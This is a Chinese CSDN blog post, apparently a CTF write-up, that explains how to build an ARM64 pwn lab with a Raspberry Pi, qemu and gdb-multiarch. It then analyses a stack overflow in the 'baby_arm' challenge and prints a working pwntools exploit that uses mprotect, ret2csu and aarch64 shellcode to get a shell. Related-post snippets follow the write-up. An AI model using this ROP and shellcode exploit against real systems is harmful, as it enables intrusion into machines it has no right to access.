ARM PWN 环境搭建和测试

最新推荐文章于 2024-08-22 13:49:08 发布
最新推荐文章于 2024-08-22 13:49:08 发布
阅读量3.4k 收藏 11
点赞数 1
分类专栏: writeup 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012655643/article/details/84584974
版权

ARM PWN 探究之环境搭建和测试

最近一次比赛(“骇极杯” 全国大学生信安邀请赛
)遇到了一道arm pwn的题目,题目不难,附上链接 baby_arm。我就想后面说不定也要做arm的题,就搭建一个环境吧。
手上刚好有个闲置的树莓派3b+,众所周知,树莓派是arm架构的,刚好拿来用。

树莓派装64位系统

都2018年了,怎么还在用32位系统呢?
https://github.com/chainsx/ubuntu64-rpi
格式化sd卡,用win32diskimager把系统烧录到sd卡就好,插上树莓派,连接键盘和显示器,开机就好了,非常的简单。
用scp命令把我们的题目传到树莓派上去

scp ./baby_arm tangnet@192.168.205.133:/home/tangent/Desktop/

再用socat把可执行文件绑定到某个端口。

$ socat tcp-listen:6666,fork exec:./baby_arm

这样我们nc上去就可以运行这个程序了

nc 192.168.205.133 6666

本地运行调试环境搭建

我们一般本地调试都是在Linux的虚拟机下,而且一般都是64位或者32位架构的。我们可以基于qemu去模拟arm环境。
安装 git,gdb 和 gdb-multiarch,gdb 的插件 pwndbg(或者 gef 等 gdb plugin),pwntools ,这些工具的安装还是比较简单的,就不详细写了,相信大家都是已经装好了的。

安装 qemu

我们对版本的要求不是很严格, 直接通过 apt 等包管理安装

$ sudo apt-get install qemu-user
$ sudo apt-get install qemu-use-binfmt qemu-user-binfmt:i386

通过 qemu 模拟 arm环境,进而进行运行和调试
此时已经可以去运行静态链接的arm架构的程序了,会自动调用对应架构的 qemu。但是很明显我们这个题是动态链接的,他找不到对应的动态链接库,就会报错,从而无法运行
在这里插入图片描述
这就需要我们安装对应架构的共享库,使用apt来搜索一下

apt search "libc6-" | grep "AARCH64"

在这里插入图片描述
然后 apt 安装就可以了
在这里插入图片描述
动态链接程序用qemu运行需要指定动态链接库的路径
在这里插入图片描述

qemu-aarch64 -L /usr/aarch64-linux-gnu ./baby_arm

调试

可以使用 qemu 的 -g 指定端口

qemu-aarch64 -g 1235 -L /usr/aarch64-linux-gnu ./baby_arm

使用gdb-multiarch的remote功能进行调试

pwndbg> target remote localhost:1235

这样就可以成功进行调试了
在这里插入图片描述

漏洞分析

现在的ida pro 7.0版本可以对arm架构的程序F5了,这就很方便,把binary文件拖进ida在这里插入图片描述

很明显有一个栈溢出漏洞
在这里插入图片描述
用checksec查看保护
在这里插入图片描述
发现NX enable,这样就不能直接写shellcode了
但是发现plt表里面有mprotect函数,所以我们可以构造fake stack 去调用mprotect函数,修改bss段为可执行,再往bss段写shellcode ,控制返回地址跳转到bss段就可以getshell了。
因为是64位的arm程序,我们需要知道arm架构调用函数的时候的传参规则,才能构造我们的ROP链。详细内容可以阅读
http://infocenter.arm.com/help/topic/com.arm.doc.ihi0055b/IHI0055B_aapcs64.pdf
总而言之,就是函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中
我们发现程序中并不能找到所以寄存器所对应的gadget,所以在构造fake stack的时候,用到了return2csu这个技术,具体论文在(https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf)
exp如下:

from pwn import *
import os

context.arch = 'arm64'

def gdb_attach():
    os.system('xfce4-terminal -x sh -c "gdb-multiarch pwn -ex \'target remote 127.0.0.1:1234\'"')

#p = process(['qemu-aarch64','-g','1234','-L','/usr/aarch64-linux-gnu/','./pwn'])
# gdb_attach()
p = remote('192.168.205.133', 6666)
p.recvuntil('Name:')
p.send(asm(shellcraft.aarch64.sh()) + p64(0x400600)+p64(0x411068)) # 44

raw_input()
padding = ''
for _ in xrange(9):
    padding += chr(ord('a')+_) * 8
p.send(padding+p64(0x4008CC)+p64(0x411068)+p64(0x4008AC) + p64(0) + p64(0xdeadbeef)+p64(0x411068+44)+p64(7)+p64(4096)+p64(0x411000))

p.interactive()

remote到远程主机(树莓派)
我们就拿到了树莓派的shell了

Tangent_Orz
关注
专栏目录
Pwn环境搭建
qq_37369412的博客
11-25 1300
title: Pwn环境搭建 ​ 1.ubuntu16.04设置系统语言为中文 参考文献:https://jingyan.baidu.com/article/3aed632ec1d120701180916b.html 2.更换Ubuntu16.04镜像下载源,推荐阿里源 首先我们要找到国内的镜像源路径,这里要注意要找ubuntu16.04相对应的,打开链接如图:https://www.cnblogs.com/hello-/articles/11151038.htm [外链图片转存失败,源站可能有防盗链机制,
ubuntu18.04 pwn环境搭建
winterze的博客
03-31 3989
ctf pwn环境参考 内容参考网址: https://bbs.pediy.com/thread-257558.htm https://www.jianshu.com/p/a7e2da50263e VMware 15 pro ububtu 18.04 安装vm tools sudo apt-get install vim 执行所有升级 sudo apt-get update sudo apt-ge...
PWN环境配置
最新发布
GalaxySpaceX的博客
08-22 189
PWN环境配置
armpwn环境搭建
qq_51474381的博客
05-02 329
ubantu安装报错太多,直接用deepin最新版搭建,十分顺利。 1.准备git,gdb 和 gdb-multiarch sudo apt-get update sudo apt-get install git gdb gdb-multiarch 2.安装 gdb 的插件 pwndbg git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh 3.安装pwntools(可能要先安装pip) sudo pip insta
2022CTF培训(八)ARM PWN 环境搭建&ARM PWN 入门
sky123博客
12-16 1461
而 docker 镜像是根据配置文件 DockerFile 来创建的,分析 DockerFile 可知首先是拉取一个 Ubuntu16.04 的镜像并安装了相关的软件,由于安装了文件传输工具 curl ,因此可以考虑通过利用漏洞执行 curl 命令来将 flag 文件下载下来。根据 ARM 的函数调用约定,LR 寄存器存储返回地址,因此这条 gadget 中的 PC 决定 下一个函数的地址,而 LR 决定下一个函数的返回地址。qemu是一款可执行硬件虚拟化的虚拟机,与他类似的还有Bochs、PearPC,
ARM pwn 环境搭建和使用
qq_60209620的博客
03-30 383
qemu是一款可执行硬件虚拟化的虚拟机,与他类似的还有Bochs、PearPC,之前我们已经安装完了gdb-multiarch,现在来试试怎么调试程序。这个文件夹,该文件夹即对应刚安装好的arm32位libc库.到这里了,我们就能直接运行静态链接arm的程序了,拿的。但qemu具有高速(配合KVM)、跨平台的特性。例子:调试32位的静态程序。但是这里我们只用下载。
pwn(安装环境)
2302_80935968的博客
05-08 910
在终端命令框中输入sudo passwd root后会让你输入kali的默认密码kali,然后会提示你输入一个新的密码,在输入过程中输入的密码不会像一般的设置密码一样显示,再按照提示输入一遍就可以了,完成后可以输入su root切换成root用户了。俗话说的好,静态调试看IDA,动态调试看pwngdb(其实动态调试也能用IDA啦),pwngdb可以帮助你在可执行文件执行的时候查看各种寄存器的值,以及函数地址和偏移量,甚至可以让你一条汇编语言一条汇编语言分析,是分析程序不可或缺的工具。
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 2926
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
一、pwn - 零基础ROP之Android ARM 32位篇(新修订,精华篇)
键盘的起始页
04-17 1030
一旦你知道了溢出的偏移量,你就可以构造一个包含NOP滑梯、shellcode以及用于覆盖PC的正确地址的有效载荷。你需要确保shellcode位于溢出点之后,并且PC被设置为指向NOP滑梯的开始部分,这样当执行流到达该位置时就会滑入你的shellcode并执行。使用模式创建工具来确定哪部分输入覆盖了程序计数器(PC),是一种常见的方法,特别是在开发缓冲区溢出漏洞利用时。当程序崩溃时,检查程序计数器(PC)的值。工具将输出一个数字,表示在模式中的偏移量,这个数字就是从输入数据的开始到覆盖PC的点的字节数。
PWN基础1:环境搭建
prettyX的博客
07-04 933
环境搭建 1、下载Ubuntu:https://ubuntu.com/download/desktop 并在虚拟机中搭建好 LTS版本是什么意思? Ubuntu有些版本后面是带有LTS标识的。LTS是Long-Term Support的缩写,因此LTS版本也就是“长期支持版本”的意思。Ubuntu会为LTS版本提供长达5年的系统维护更新和技术支持,以确保系统能长期稳定和安全地运行,更加适合用于部署在服务器生产环境。 2、虚拟机安装好后,更新一下系统 sudo apt-get update
qt linux wifi,在linux,arm上的屏幕搜索wifi并连接(qt,多选择,wifi按信号排列)转...
weixin_33380613的博客
05-12 1280
先上代码!!#include "widget.h"#include "ui_widget.h"#include #include Widget::Widget(QWidget *parent) :QWidget(parent),ui(new Ui::Widget){ui->setupUi(this);int i =0;int j =0;int t =0;QVBoxLayout *groupB...
PWN_环境搭建
qq_42192672的博客
12-26 1286
最近需要重新搭建一个PWN的环境来应对接下来的任务,就顺便记录一下,以防将来需要搭建的情况 虚拟环境搭建 这里还是用乌班图16,我选的是中科大的镜像:http://mirrors.ustc.edu.cn/ubuntu-releases/16.04/ 然后就去VMWARE里去安装 安装完后有一个很大的困扰:Linux鼠标选定自动弹出 ^C,例如在Terminal里 用 xshell 时莫名奇妙发现...
pwn环境配置
swedsn
11-06 3867
文章目录前言二、安装linux必备的环境前提条件:1.将中文目录(如桌面)改成英文目录2.安装VMware-tools3.更新清华源,4.安装编辑器(1)安装vim(2)安装sublime5.小技巧三、安装pwn环境1:安装pwntools2:安装one_gadget3:安装gdb插件安装 git安装 pip3安装pwndbg安装pedapwndbg与peda插件的切换4:设置共享文件夹 前言 下面包含的是pwn做题时用到的一些环境和工具,讲的有些简略,具体的话可以自己再根据某一个内容具体查询。 # 一、
pwn的一些环境搭建
weixin_30871905的博客
12-27 129
<1>pwntools库安装 pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 本文将基于KUbuntu 16.04 安装 ---------------------------------------------------------------------------------------...
Ubuntu pwn环境搭建
monster663的博客
06-01 1270
重新装了一下pwn环境,踩到了好多坑,顺便记录一下。
linux 之pwn环境建立
Maxmalloc的博客
11-03 1868
当电脑建立相关环境遇到一些麻烦后,如何重新快速搭建pwn相关的linux环境是个重要的的问题,写篇博客给自己记一下 1.设置root密码 sudo passwd root 2.安装pip sudo apt-get install python-pip 3.安装pwntools pip install pwntools 4.转储ida server(方便ida远程调试) 5.安装LibcSear...
pwn环境搭建_pwn入门学习(一)—— 环境搭建
weixin_39609670的博客
12-19 300
pwn入门学习(一)—— 环境搭建疫情期间学习技术#中国加油##武汉加油#所用环境为Ubuntu 18.04更换Ubuntu下载镜像源Ubuntu默认下载源在美国,相对速度较慢,可将其下载镜像源更换为国内镜像。清华开源软件镜像站Ubuntu:mirrors.tuna.tsinghua.edu.cn/help/ubuntu/具体操作:(1) 备份源文件cd /etc/aptsudo cp sourc...
kali配置pwn环境
10-15
要在Kali Linux上配置pwn环境,可以按照以下步骤进行: 1. 安装必要的软件包:sudo apt-get update && sudo apt-get install gdb gcc libc6-dev-i386 2. 安装pwndbg:git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh 3. 安装pwntools:sudo apt-get install python3 python3-pip && pip3 install pwntools 4. 安装ROPgadget:sudo apt-get install python3-capstone && git clone https://github.com/JonathanSalwan/ROPgadget.git && cd ROPgadget && sudo python3 setup.py install 5. 安装one_gadget:sudo apt-get install ruby && gem install one_gadget 6. 配置gdbinit文件:echo "source /usr/share/pwndbg/gdbinit.py" >> ~/.gdbinit 7. 配置bashrc文件:echo "export PATH=$PATH:/opt/pwntools/bin" >> ~/.bashrc 完成上述步骤后,就可以在Kali Linux上愉快地进行pwn了!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值